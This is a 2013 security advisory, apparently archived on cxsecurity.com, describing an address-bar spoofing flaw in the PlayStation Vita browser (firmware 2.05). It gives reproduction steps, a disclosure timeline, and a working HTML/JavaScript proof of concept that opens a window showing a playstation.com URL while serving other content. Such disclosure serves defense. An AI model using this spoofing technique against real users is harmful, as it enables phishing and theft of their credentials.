Sony Playstation Vita Addressbar Spoofing

2013.02.06
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[MajorSecurity-SA-2013-014]Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing Details ============= Product: Sony Playstation Vita Browser - firmware 2.05 CVE-ID: CVE-2013-XXXX Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://de.playstation.com/psvita/ Advisory-Status: published Credits ============= Discovered by: David Vieira-Kurz of MajorSecurity original advisory: http://majorsecurity.com/psvita/sa-2013-014-en.php Affected Products ============= Sony Playstation Vita Browser ( Firmware: 2.05 ) Prior versions may also be affected Product Description ============= "Playstation Vita is the new handheld of Sony." Vulnerability Details ============= David Vieira-Kurz has discovered some vulnerabilities in Sony PS Vita based on firmware 2.05 . The weakness is caused due to an error within the handling of URLs when using javascript's window.open() method. This can be exploited to potentially trick users into supplying sensitive information to a malicious web site, because information displayed in the address bar can be constructed in a certain way, which may lead users to believe that they're visiting another web site than the displayed web site. Steps to reproduce ============= 1) Visit http://majorsecurity.com/psvita/psvita-demo.html with a PS Vita with firmware 2.05 installed 2) click the "demo" button 3) The web browser will open a new window with "http://de.playstation.com/psvita/" in the adress bar, but in fact "http://de.playstation.com/psvita/" is being displayed inside an iframe within the host http://www.majorsecurity.com Proof of Concept ============= A proof-of-concept code is available here: http://de.playstation.com/psvita/ Solution ============= Users should upgrade to a newer version as far as the vendor has supplied a patch. Timeline ================ 2013-01-20, vulnerability identified 2013-01-20, vulnerability reproduced with firmware 2.05 2013-01-20, vendor has been informed 2013-01-27, vendor has been informed once again 2013-01-29, advisory published with partially details 2013-02-05, advisory published with full details and poc Use of terms ================ Unaltered electronic reproduction of this advisory is permitted. For all other reproduction or publication, in printing or otherwise, contact us for permission. Use of the advisory constitutes acceptance for use in an "as is" condition. All warranties are excluded. In no event shall MajorSecurity be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if MajorSecurity has been advised of the possibility of such damages. ------------------------- PROOF OF CONCEPT CODE -------------------------- <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html> <head><title>Sony PS Vita - firmware 2.05 - address bar spoofing</title> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <!-- Copyright 2013 David Vieira-Kurz and MajorSecurity GmbH --> </head> <body><h1>Sony PS Vita - firmware 2.05 - address bar spoofing</h1> <li>Please click the button to run the proof of concept. <button id="one">Demo</button></li> <script type="text/javascript"> document.getElementById('one').onclick = function() { myWindow=window.open('http://de.playstation.com/psvita/','Playstation Vita, PS Vita','width=200,height=100,location=yes'); myWindow.document.write("<html><head></head><body><b>This page is still being hosted on majorsecurity.com, but the address bar is pointing to another domain.</b><br><br><iframe src=\"http://de.playstation.com/psvita/\");></iframe></scri+pt></body></html>"); myWindow.focus(); return false; } </script> </body> </html>

References:

http://de.playstation.com/psvita/
http://majorsecurity.com/psvita/sa-2013-014-en.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2023, cxsecurity.com

 

Back to Top